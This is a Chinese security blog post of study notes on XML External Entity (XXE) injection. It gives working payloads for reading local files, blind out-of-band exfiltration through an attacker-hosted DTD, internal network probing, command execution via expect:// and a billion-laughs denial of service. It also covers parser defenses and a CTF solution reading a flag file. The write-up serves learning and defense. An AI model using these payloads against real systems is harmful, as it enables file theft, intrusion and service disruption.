<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Yu"><title>XML External Entity Injection --笔记 · Venture's Blog</title><meta name="description" content="DTD简介文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。
DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。
DTD 引用方式(简要了解)： 
1.DTD 内部声明
1&amp;lt;!DOCTYPE 根元素 [元素声明]&amp;gt;
2.DTD 外"><meta name="keywords" content="Security"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Venture's Blog</a></h3><div class="description"><p>Security</p></div></div></div><ul class="social-links"></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/links">友链</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/touxiang.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>XML External Entity Injection --笔记</a></h3></div><div class="post-content"><h2 id="DTD简介"><a href="#DTD简介" class="headerlink" title="DTD简介"></a>DTD简介</h2><p><strong>文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。</strong></p>
<p><strong>DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。</strong></p>
<p><strong>DTD 引用方式(简要了解)：</strong> </p>
<p><strong>1.DTD 内部声明</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE 根元素 [元素声明]&gt;</div></pre></td></tr></table></figure>
<p><strong>2.DTD 外部引用</strong></p>
<p>假如 DTD 位于 XML 源文件的外部，那么它应通过下面的语法被封装在一个 DOCTYPE 定义中： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE 根元素 SYSTEM “外部DTD的URI”&gt;</div></pre></td></tr></table></figure>
<p><strong>3. 引用公共DTD</strong></p>
<p>&lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt; </div><div class="line">&lt;!DOCTYPE configuration PUBLIC “-//mybatis.org//DTD Config 3.0//EN”</div><div class="line">“http://mybatis.org/dtd/mybatis-3-config.dtd”&gt;</div><div class="line">以!DOCTYPE开始,configuration是文档根元素名称；PUBLIC表示是公共DTD；-表示是非ISO组织；mybatis.org表示组织；DTD 表示类型；Config 表示标签；3.0是标签后附带的版本号；EN表示DTD语言是英语；最后是DTD的URL；</div></pre></td></tr></table></figure>
<p>所有的 XML 文档（以及 HTML 文档）均由以下简单的构建模块构成：</p>
<ul>
<li>元素 </li>
<li>属性 </li>
<li>实体 </li>
<li>PCDATA  </li>
<li>CDATA </li>
</ul>
<p>重点了解实体</p>
<p><strong>实体是用于定义引用普通文本或特殊字符的快捷方式的变量</strong> </p>
<p><strong>内部实体声明</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;</div></pre></td></tr></table></figure>
<p>一个实体由三部分构成:&amp;符号, 实体名称, 分号 (;)，这里&amp;在GET中需要进行URL编码，因为是使用参数传入xml的，&amp;符号会被认为是参数间的连接符号 </p>
<p><strong>外部实体声明</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL&quot;&gt;</div></pre></td></tr></table></figure>
<p>不同的语言支持的协议不同 </p>
<p><img src="http://p4hcm0dlf.bkt.clouddn.com/blog/180813/6iIjK6JHf4.png?imageslim" alt="mark"></p>
<p><strong>参数实体声明</strong> </p>
<p>参数实体实际上不是在具体实例化文档中使用，而是在DTD文档内部被使用 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&lt;!ENTITY % 实体名称 “实体的值”&gt;</div><div class="line">&lt;!ENTITY % 实体名称 SYSTEM “URI”&gt;</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE xee [</div><div class="line">       &lt;!ENTITY % name &quot;XXE&quot;&gt;</div><div class="line">]&gt;</div><div class="line">&lt;/xxe&gt;</div></pre></td></tr></table></figure>
<h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><h3 id="1-文件读取"><a href="#1-文件读取" class="headerlink" title="1.文件读取"></a>1.文件读取</h3><p>攻击利用大致分两个情形，一种是有回显的情况，一种是无会回显的情况</p>
<p><strong>有回显：</strong></p>
<p>1.直接读取文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;</div><div class="line">&lt;!DOCTYPE a [</div><div class="line">       &lt;!ENTITY b SYSTEM &quot;file:///e://tool/1.txt&quot;&gt;</div><div class="line">]&gt;</div><div class="line">&lt;c&gt;&amp;b;&lt;/c&gt;</div></pre></td></tr></table></figure>
<p>2.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;</div><div class="line">&lt;!DOCTYPE a [</div><div class="line">       &lt;!ENTITY % d SYSTEM &quot;http://localhost/attack1.dtd&quot;&gt;</div><div class="line">%d;]&gt;</div><div class="line">&lt;c&gt;&amp;b;&lt;/c&gt;</div></pre></td></tr></table></figure>
<p>其中<code>attack.dtd</code>的内容为： <code>&lt;!ENTITY b SYSTEM &quot;file:///etc/passwd&quot;&gt;</code></p>
<p>3.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE a SYSTEM &quot;http://xxx.xxx.xxx/attack.dtd&quot;&gt;</div></pre></td></tr></table></figure>
<p>其中<code>attack.dtd</code>内容同上不变 </p>
<p><strong>没有回显</strong></p>
<p>如果服务器没有回显，只能使用Blind XXE漏洞来构建一条外带数据(OOB)通道来读取数据 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;</div><div class="line">&lt;!DOCTYPE a [</div><div class="line">&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=e://tool/1.txt&quot;&gt;</div><div class="line">&lt;!ENTITY % dtd SYSTEM &quot;http://localhost/attack.dtd&quot;&gt;</div><div class="line">%dtd;</div><div class="line">%mydata;</div><div class="line">]&gt;</div></pre></td></tr></table></figure>
<p>其中<code>attack.dtd</code>的内容为： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;!ENTITY % all</div><div class="line">&quot;&lt;!ENTITY &amp;#x25; mydata SYSTEM &apos;http://localhost/?%file;&apos;&gt;&quot;</div><div class="line">&gt;</div><div class="line">%all;</div></pre></td></tr></table></figure>
<p>最里层的嵌套里必须为字符实体</p>
<blockquote>
<p>踩了很多坑，需要注意的是，dtd里的内容url需要添加”;”,最里层的嵌套的%需要为字符实体，需要添加”%all“</p>
<p>若要读取文件本身包含&lt;等字符，如PHP文件，需要利用php://filter的base64编码绕过 </p>
</blockquote>
<p>如果网站开启了报错，也可以直接在报错信息中查看数据</p>
<p><img src="http://p4hcm0dlf.bkt.clouddn.com/blog/180813/9AhHCbCeBi.png?imageslim" alt="mark"></p>
<p>当然可以在apache访问日志中查看</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">::1 - - [13/Aug/2018:17:29:51 +0800] &quot;GET /attack.dtd HTTP/1.0&quot; 200 85</div><div class="line">::1 - - [13/Aug/2018:17:29:51 +0800] &quot;GET /?YWJj HTTP/1.0&quot; 200 1751</div><div class="line">::1 - - [13/Aug/2018:17:29:51 +0800] &quot;GET /XXE.php HTTP/1.1&quot; 200 1550</div><div class="line">::1 - - [13/Aug/2018:17:31:25 +0800] &quot;GET /attack.dtd HTTP/1.0&quot; 200 85</div><div class="line">::1 - - [13/Aug/2018:17:31:25 +0800] &quot;GET /?YWJj HTTP/1.0&quot; 200 1751</div><div class="line">::1 - - [13/Aug/2018:17:31:25 +0800] &quot;GET /XXE.php HTTP/1.1&quot; 200 1550</div></pre></td></tr></table></figure>
<h3 id="2-内网信息探测及攻击"><a href="#2-内网信息探测及攻击" class="headerlink" title="2.内网信息探测及攻击"></a>2.内网信息探测及攻击</h3><p>根据不同xml解析器会得到不同的回显报错结果 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </div><div class="line">&lt;!DOCTYPE xxe [</div><div class="line">&lt;!ELEMENT name ANY &gt;</div><div class="line">&lt;!ENTITY xxe SYSTEM &quot;http://127.0.0.1:80&quot; &gt;]&gt;</div><div class="line">&lt;root&gt;</div><div class="line">&lt;name&gt;&amp;xxe;&lt;/name&gt;</div><div class="line">&lt;/root&gt;</div></pre></td></tr></table></figure>
<p>结合其他的漏洞比如：struts2 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </div><div class="line">&lt;!DOCTYPE xxe [</div><div class="line">&lt;!ELEMENT name ANY &gt;</div><div class="line">&lt;!ENTITY xxe SYSTEM &quot;http://127.0.0.1:80/payload&quot; &gt;]&gt;</div><div class="line">&lt;root&gt;</div><div class="line">&lt;name&gt;&amp;xxe;&lt;/name&gt;</div><div class="line">&lt;/root&gt;</div></pre></td></tr></table></figure>
<h3 id="3-执行系统命令"><a href="#3-执行系统命令" class="headerlink" title="3.执行系统命令"></a>3.执行系统命令</h3><p>php环境下，xml命令执行需要php装有expect扩展，但是该扩展默认没有安装 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </div><div class="line">&lt;!DOCTYPE xxe [</div><div class="line">&lt;!ELEMENT name ANY &gt;</div><div class="line">&lt;!ENTITY xxe SYSTEM &quot;expect://id&quot; &gt;]&gt;</div><div class="line">&lt;root&gt;</div><div class="line">&lt;name&gt;&amp;xxe;&lt;/name&gt;</div><div class="line">&lt;/root&gt;</div></pre></td></tr></table></figure>
<h3 id="4-DOS攻击"><a href="#4-DOS攻击" class="headerlink" title="4.DOS攻击"></a>4.<strong>DOS攻击</strong></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</div><div class="line">   &lt;!DOCTYPE lolz [</div><div class="line">&lt;!ENTITY lol &quot;lol&quot;&gt;</div><div class="line">&lt;!ENTITY lol2 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;</div><div class="line">&lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;</div><div class="line">&lt;!ENTITY lol4 &quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;</div><div class="line">&lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;</div><div class="line">&lt;!ENTITY lol6 &quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;</div><div class="line">&lt;!ENTITY lol7 &quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;</div><div class="line">&lt;!ENTITY lol8 &quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;</div><div class="line">&lt;!ENTITY lol9 &quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;</div><div class="line">]&gt;</div><div class="line">&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</div></pre></td></tr></table></figure>
<h2 id="防御XXE攻击"><a href="#防御XXE攻击" class="headerlink" title="防御XXE攻击"></a>防御XXE攻击</h2><p><strong>一、禁用外部实体</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">PHP：</div><div class="line">libxml_disable_entity_loader(true);</div><div class="line"></div><div class="line">JAVA:</div><div class="line">DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();</div><div class="line">dbf.setExpandEntityReferences(false);</div><div class="line"></div><div class="line">Python：</div><div class="line">from lxml import etree</div><div class="line">xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</div></pre></td></tr></table></figure>
<p><strong>二、尽量不要让用户直接提交XML代码,如果一定要,则需过滤用户提交的XML数据</strong>  </p>
<p>关键词：&lt;!DOCTYPE和&lt;!ENTITY，或者，SYSTEM和PUBLIC。 </p>
<h2 id="jarvis-oj-API调用"><a href="#jarvis-oj-API调用" class="headerlink" title="jarvis-oj API调用"></a>jarvis-oj API调用</h2><p>Content - Type头限制提交的数据为json，但其实服务器也可以接受其他的数据</p>
<p>这里就需要去修改Content - Type头为<code>application/xml</code> ，根据提示，读文件/home/ctf/flag.txt，然后POST</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</div><div class="line">&lt;!DOCTYPE xxe [</div><div class="line">       &lt;!ENTITY xxe SYSTEM &quot;file:///home/ctf/flag.txt&quot; &gt;</div><div class="line">]&gt;</div><div class="line">&lt;root&gt;</div><div class="line">&lt;user&gt;&amp;xxe;&lt;/user&gt;</div><div class="line">&lt;/root&gt;</div></pre></td></tr></table></figure>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://security.tencent.com/index.php/blog/msg/69" target="_blank" rel="external">https://security.tencent.com/index.php/blog/msg/69</a></p>
<p><a href="http://www.4o4notfound.org/index.php/archives/29/" target="_blank" rel="external">http://www.4o4notfound.org/index.php/archives/29/</a></p>
<p><a href="https://www.hackersb.cn/hacker/211.html" target="_blank" rel="external">https://www.hackersb.cn/hacker/211.html</a></p>
<p><a href="https://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&amp;mid=2727829287&amp;idx=1&amp;sn=4a68b346b3551c8576faa1834db1ae67&amp;chksm=805088afb72701b95a36dcc993a9fcfee4636b1ed97713a1b6adc66bf355bb3253cb09cc2939&amp;mpshare=1&amp;scene=23&amp;srcid=0812OTnZAKmFxpZZxGIcPhDY#rd" target="_blank" rel="external">jd</a></p>
<p><a href="https://www.secpulse.com/archives/6256.html" target="_blank" rel="external">https://www.secpulse.com/archives/6256.html</a></p>
<p><a href="https://thief.one/2017/06/20/1/" target="_blank" rel="external">https://thief.one/2017/06/20/1/</a></p>
<p><a href="http://www.w3school.com.cn/dtd/index.asp" target="_blank" rel="external">http://www.w3school.com.cn/dtd/index.asp</a></p>
<p><a href="http://www.freebuf.com/vuls/175451.html" target="_blank" rel="external">http://www.freebuf.com/vuls/175451.html</a></p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2018-08-14</span><i class="fa fa-tag"></i></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" href="http://twitter.com/home?status=,http://yoursite.com/2018/08/14/XXE笔记/,Venture's Blog,XML External Entity Injection --笔记,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="next pagbuttons"><a class="btn" role="navigation" href="/2018/08/14/hash长度扩展/" title="哈希长度扩展攻击（hash length extension attacks）--笔记">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>